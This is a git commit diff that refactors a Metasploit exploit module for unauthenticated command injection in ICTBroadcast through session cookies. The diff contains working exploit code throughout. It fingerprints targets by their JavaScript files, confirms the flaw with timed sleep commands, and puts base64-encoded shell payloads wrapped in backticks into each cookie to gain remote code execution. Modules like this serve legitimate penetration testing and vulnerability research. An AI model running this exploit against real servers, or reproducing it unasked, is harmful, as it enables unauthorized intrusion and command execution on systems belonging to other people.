Refactor fingerprint detection, cookie handling and per-cookie injection

Chocapikk · Chocapikk · commit 2c9053c45e13 · 2025-08-04T17:49:34.000+02:00
- Centralize JS fingerprint checks in `check`
- Memoize `get_valid_cookies` correctly and reuse a single `cookie_jar`
- Update `inject_command` to test payload on each cookie separately
diff --git a/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb b/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb
@@ -20,7 +20,7 @@ def initialize(info = {})
           and processed, allowing an attacker to inject arbitrary system commands.
         },
         'Author' => [
-          'Valentin Lobstein' # Metasploit module, Vulnerability discovery
+          'Valentin Lobstein' # Metasploit module author
         ],
         'License' => MSF_LICENSE,
         'References' => [
@@ -51,81 +51,73 @@ def initialize(info = {})
   end
 
   def get_valid_cookies
-    return @valid_cookies if @valid_cookies
-
-    print_status('Retrieving session cookies dynamically...')
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'login.php')
-    )
-
-    res_cookies = res&.get_cookies
-    return [] unless res_cookies
-    cookies = res_cookies.split('; ').map do |c|
-      key, value = c.split('=', 2)
-      next unless key && value
-
-      Msf::Exploit::Remote::HTTP::HttpCookie.new(key.strip, value.strip)
-    end.compact
+    @get_valid_cookies ||= begin
+      print_status('Retrieving session cookies dynamically')
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'login.php')
+      )
+      fail_with(Failure::UnexpectedReply, 'No response from server') unless res
+
+      if (cookies = res.get_cookies)
+        cookie_jar.clear
+        cookie_jar.parse_and_merge(
+          cookies,
+          "#{datastore['SSL'] ? 'https' : 'http'}://#{rhost}:#{rport}"
+        )
+        print_status("Found cookies: #{cookie_jar.cookies.map(&:to_s).join('; ')}")
+      end
 
-    print_status("Found cookies: #{cookies.map(&:to_s).join(', ')}")
-    @valid_cookies = cookies
+      cookie_jar
+    end
   end
 
-  def inject_cookie_payload(command)
-    cookies = get_valid_cookies
-    return if cookies.blank?
+  def inject_command(command)
+    jar = get_valid_cookies
+    return if jar.empty?
 
-    encoded_command = Rex::Text.encode_base64(command)
-    payload = "echo${IFS}#{encoded_command}|base64${IFS}-d|sh"
+    jar.cookies.each do |c|
+      original = c.value
+      c.value = "`echo${IFS}#{Rex::Text.encode_base64(command)}|base64${IFS}-d|sh`"
 
-    updated_cookies = cookies.map do |cookie|
-      "#{cookie.name}=`#{payload}`"
-    end.join('; ')
+      send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'login.php'),
+        'cookie_jar' => jar
+      )
 
-    send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'login.php'),
-      'headers' => { 'Cookie' => updated_cookies }
-    )
+      c.value = original
+    end
   end
 
   def check
-    print_status('Checking if target is an ICTBroadcast instance…')
+    print_status('Checking ICTBroadcast via JS fingerprints')
+
+    fingerprint_found = %w[
+      IVRDesigner.js agent.js campaign.js campaign_feedback.js
+      campaign_integration.js phone.js supervisor.js trunk.js
+    ].any? do |file|
+      uri = normalize_uri(target_uri.path, 'js', file)
+      res = send_request_cgi!('method' => 'GET', 'uri' => uri)
+      res&.code == 200 && res.body.include?('ICT Innovations')
+    end
 
-    res = send_request_cgi!(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path)
-    )
-    return Exploit::CheckCode::Unknown('No response from target.') unless res
-    return Exploit::CheckCode::Safe unless res.code == 200
-
-    html = res.get_html_document
-    title = html.at('title')&.text
-    keywords = html.at("meta[name='keywords']")&.[]('content')
-    description = html.at("meta[name='description']")&.[]('content')
-
-    if title&.include?('ICT Broadcast') ||
-       keywords&.include?('ict') ||
-       description&.include?('ICT Broadcast')
-
-      print_good('ICTBroadcast detected, verifying injection…')
-
-      [1, 2, 3, 4, 5].sample(3).each do |t|
-        start_time = Time.now
-        inject_cookie_payload("sleep #{t}")
-        if (Time.now - start_time) >= (t - 0.3)
-          return Exploit::CheckCode::Vulnerable("Injection confirmed (slept #{t}s)")
-        end
-      end
+    return CheckCode::Safe unless fingerprint_found
+
+    print_good('JS fingerprint found; performing timing tests')
 
-      return Exploit::CheckCode::Appears('ICTBroadcast detected, but injection timing did not match.')
+    [3, 4, 5].sample(2).each do |t|
+      start = Time.now
+      inject_command("sleep #{t}")
+      if Time.now - start >= (t - 0.3)
+        return CheckCode::Vulnerable("Injected RCE (slept #{t}s)")
+      end
     end
 
-    Exploit::CheckCode::Safe
+    CheckCode::Appears('Fingerprint present but timing did not match')
   end
 
   def exploit
-    inject_cookie_payload(payload.encoded)
+    inject_command(payload.encoded)
   end
 end
